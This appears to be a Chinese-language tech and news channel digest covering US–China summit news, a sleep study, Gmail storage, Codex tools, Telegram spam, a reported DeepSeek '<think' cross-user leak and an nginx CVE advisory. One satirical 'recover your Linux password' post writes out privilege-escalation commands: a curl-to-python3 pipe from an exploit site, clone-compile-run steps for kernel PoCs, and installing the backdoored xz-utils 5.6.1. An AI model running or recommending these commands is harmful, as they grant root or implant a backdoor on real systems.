Skip to main content

OKHK 👀

OKHK 👀
OKHK 👀
个人数字泔水\(⁠◔⁠‿⁠◔⁠)
Thinking...

  2. 习近平5月15日在中南海同特朗普会谈。特朗普15日下午离京返美,在专机上接受媒体访问。
    他透露,对于释放黎智英的请求,中方答复负面;对释放锡安教会金明日牧师,中方表示会认真考虑,他感到乐观。
    特朗普说,习近平阐明了其台海立场,双方详细地讨论了本轮对台军售,他完整聆听,没有当场给出许诺。他表示,将在与赖清德沟通后,在近期对军售做决定。
    特朗普受访说,美方“不希望看到有人说‘美国支持我们,我们独立吧’”。王毅在15日的新闻稿中呼应称“我们在会晤中感受到,美方了解中方的立场,重视中方的关切,同国际社会一样,不认同也不接受台湾走向独立”。
    他又透露,习近平在5月15日小范围会谈上曾问他,如果中国打台湾,美国是否出兵,他答说他不谈这个话题。
    Fox路透社纽约时报

  3. 每天睡 6-8 小时与较低的早逝及患病风险相关
    #科学

    一项对 50 万成年人的睡眠时间和衰老迹象进行的大规模分析,确定了一个最佳的睡眠时间:每天睡 6至 8 小时与较低的早逝及患病风险有关。多于或少于这一时长都会加速衰老。这项研究并不意味着 6 至 8 小时适合所有人,也不能证明每天满足这个“黄金睡眠”时间要求就能直接改善健康或延缓衰老。但它确实为睡眠与人体衰老的相互关系提供了一个迄今最全面的概览。研究结果支持了一个颇具前景的假说,即调整睡眠时间可能是降低衰老相关疾病风险的一条可行途径。研究团队分析了睡眠时间与 23 种生物衰老时钟的关系,后者覆盖了 17 个人体器官的衰老特征。这些时钟分别基于蛋白水平、代谢物含量及医学影像特征构建。结果发现,多数器官呈现 U 形衰老规律,但曲线最低点(最佳睡眠时间)并不总是在同一位置。例如,基于心脏蛋白的衰老时钟显示,6小时睡眠对应了最佳健康状态;而脑部蛋白时钟显示,8 小时睡眠效果最优。此外,在某些情况下,男女的最佳睡眠时间存在差异。总体来看,与睡眠时间过长或过短的人相比,每天睡眠维持在6至8小时的人衰老更慢、健康状况更好,2型糖尿病、抑郁症等疾病的发生率也更低。
    https://www.nature.com/articles/s41586-026-10524-5
    https://news.sciencenet.cn/sbhtmlnews/2026/5/389647.shtm?id=389647

  4. Google 证实限制 Gmail 新用户的免费存储空间
    #Google

    Gmail 帐户通常会获得 15GB 的免费存储空间,但用户现在报告 Google 将 Gmail 新用户的免费存储空间限制在 5GB,要解锁 15GB 免费存储空间用户需要在帐户中添加手机号码。在用户通过社交媒体报道这一消息之后,Google 发表声明证实了它的测试:“我们正针对特定地区新创建的帐户测试新的存储策略,这将有助于我们继续为用户提供高质量的存储服务,同时鼓励用户提升其帐户安全性和数据恢复能力。”
    https://www.androidauthority.com/google-gmail-5gb-free-storage-test-3667002/

  6. OKHK 👀
    Codex-Web - 为 Codex Desktop 增加浏览器 Web 前端 https://github.com/0xcaff/codex-web 把 Codex Desktop UI 变成 Web 页面,只要有浏览器,就能连接控制 Codex。 部署需注意安全问题,可配合 Tailscale / WireGuard 等使用。 #AI #Tool #GitHub
    Codex 移动端
    https://fxtwitter.com/OpenAI/status/2055016850849993072
    🧵 Thread • FxTwitter
    OpenAI (@OpenAI)
    You've been asking for this one...

    Now in preview: Codex in the ChatGPT mobile app.

    Start new work, review outputs, steer execution, and approve next steps, all from the ChatGPT mobile app. Codex will keep running on your laptop, Mac mini, or devbox.

  7. 未題名の四月と海
    tg不久前出的guest bot这么快就被滥用了,什么中国速度
    tg bot 新加的 guest mode 正在疯狂遭到广告哥滥用:大量的 userbot 在频道评论区 at 它们的广告 bot 然后立即删除消息,接着广告 bot 就可以直接在群里发广告消息。显而易见,目前的 anti spam bot 都还没来得及适配这种新的 spam。

    如果想让 tg 增加群组可以限制 guest bot 的功能,请给这个 feedback 投票: https://bugs.telegram.org/c/61699

  10. DeepSeek 空对话中输入 <think 可泄露其他用户对话碎片
    https://github.com/deepseek-ai/DeepSeek-R1/issues/840
    issue 下面除了一个 AI 发布的中转站广告,无人在意 🤣

    可能是缓存命中的了+幻觉,不一定是泄露其他用户
    GitHub
    [紧急/严重] 空对话输入特定标签可导致会话内存泄露及跨用户数据污染 · Issue #840 · deepseek-ai/DeepSeek-R1
    安全漏洞报告:空对话中输入 <think 可泄露其他用户对话碎片 报告日期:2026-05-11 影响产品:DeepSeek Web / API(对话模型) 严重等级:🔴 紧急 – 跨用户会话数据泄露 漏洞描述 在 DeepSeek 对话系统中,攻击者可以在一个全新的空对话中仅发送字符串 <think(不闭合标签),模型会返回其他用户的对话历史片段。这违反了基本的会话隔离原则,可...

  13. 知情人士说,美国政府已批准阿里、腾讯、字节、京东等10家中国企业购买H200显卡,每家可买7.5万张。联想、富士康等获准为分销商。英伟达黄仁勋原不在随特朗普访华的企业家范围,以避免见习近平时因芯片限售而尴尬,但特朗普临时决定邀请,让他从阿拉斯加中途登机赴华。
    习近平特朗普5月14日上午在人民大会堂会谈,决定将中美定位为“建设性战略稳定关系”。特朗普逐一向习近平介绍随访企业家。习近平说,昨天两国经贸团队达成了总体平衡积极的成果。台独与台海和平水火不容,维护台海和平稳定是中美双方最大公约数,美方务必慎之又慎处理台湾问题。
    路透社新华社

  14. OKHK 👀
    还有之前的 Copy Fail 对应的重置 root 密码 curl https://copy.fail/exp | python3 && su passwd root #Linux
    #Linux 密码忘了?👇 这里有找回密码教程合订本(转
    1. Linux 找回密码教程,建议收藏!
    curl https://copy.fail/exp python3 && su
    passwd root
    设置你的新密码

    2. 你的 Linux 密码又忘了?
    没关系,这里还有一个新的!
    git clone https://github.com/V4bel/dirtyfrag.git&& cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp

    3. 不想再忘记密码了?
    我们有专业的黑客团队帮您运维服务器和保管密码!
    项目地址: https://github.com/tukaani-project/xz/tree/v5.6.1
    sudo apt install xz-utils=5.6.1-1
    sudo systemctl restart ssh

    4. 容易忘记密码的有福了,每天都有新办法!
    https://ze3tar.github.io/post-zcrx.html
    插入一个支持 ZCRX 的高端网卡,让它 down 掉,然后 ptr_ring drain + scrub loop 重复入栈把 free_count 写溢出即可

    5. 什么,你买不起高端网卡?那试试这个吧!
    git clone https://github.com/v12-security/pocs.git&& cd pocs/fragnesia && gcc -o exp fragnesia.c && ./exp

    6. 听说您的机房不允许 ssh 外连,只能通过 KVM 物理访问服务器? 没关系,我们的专业黑客团队也可以通过 nginx 帮助运维您的服务器!
    https://depthfirst.com/nginx-rift
    xint.io
    Copy Fail: 732 Bytes to Root on Every Major Linux Distribution. - Xint
    Copy Fail: 732 Bytes to Root on Every Major Linux Distribution. - Xint
    Xint Code disclosed CVE-2026-31431, an authencesn scratch-write bug chaining AF_ALG + splice() into a 4-byte page cache write. A 732-byte PoC gets root on Ubuntu, Amazon Linux, RHEL, SUSE. | AI for Security, Vulnerability Research

  17. 🔴 NGINX http_rewrite 模块漏洞;或会导致堆溢出甚至远程代码执行。

    - 漏洞的起因是 nginx 尝试将 escape 过的 URL 写入未 escape 长度的内存。
    - 在 ASLR 未被开启的情况下,可以导致远程代码执行。
    - 修复已于 1.30.1/1.31.0 发布。

    1. https://depthfirst.com/nginx-rift
    2. my.f5.com/~

    CVE: CVE-2026-42945
    CVSS: 9.2 (F5 Networks)
    Affect: [0.6.27, 1.30.0]
    Fixed-At: 1.30.1, 1.31.0

    #nginx
    Depthfirst
    NGINX Rift
    NGINX Rift
    An 18 year old memory corruption flaw in NGINX Plus and NGINX Open Source lets an unauthenticated attacker crash worker processes or execute remote code with crafted HTTP requests.

  18. 一觉醒来发生了什么 05月14日
    #Daily

    2026年5月14日
    🌍资讯快读
    1、我国科研团队成功研制出可编程量子计算原型机“九章四号”
    https://www.jiemian.com/article/14424650.html
    2、15日起售,60周岁及以上老年旅客可享淡季火车票优惠
    https://www.jiemian.com/article/14423800.html
    3、市场监管总局:推动价格法等多部法律法规修订
    https://www.jiemian.com/article/14423449.html
    4、英国将向霍尔木兹海峡多国护航行动派遣战机及军舰
    https://www.jiemian.com/article/14418746.html

    👬即刻镇小报
    1、每年在家宴上做点新菜是我的小小追求 🍽️
    https://m.okjike.com/originalPosts/6a03cfdaaf7695b4cf0b785f
    2、吃早饭晕碳后的一次顿悟
    https://m.okjike.com/originalPosts/6a03c8a3c2dc8bf83f220d8b
    3、最近看到很多年轻人因为网贷而苦恼
    https://m.okjike.com/originalPosts/6a02a697657481ea4e8f1dbf
    4、# 字节跳动的 AI 编程团队,推荐了这 10 个 Skills
    https://m.okjike.com/originalPosts/6a029a6e0294f7395cdf32d0

    今日即刻镇小报内容来自 @陈宇慧 @Alchian花生 @进击的盖茨比 @Yibie ,感谢以上即友的创作与分享。
    界面新闻
    我国科研团队成功研制出可编程量子计算原型机“九章四号”
    据中国科学技术大学,由该校潘建伟院士领衔的科研团队联合国内多家科研机构、大学,近期成功研制出可编程量子计算原型机“九章四号”,其针对特定问题的算力远超当前全球最快超级计算机El Capitan,成功建立了国际上最强的“量子计算优越性”。相关成果5月13日在国际学术期刊《自然》发表。(央视新闻)
OKHK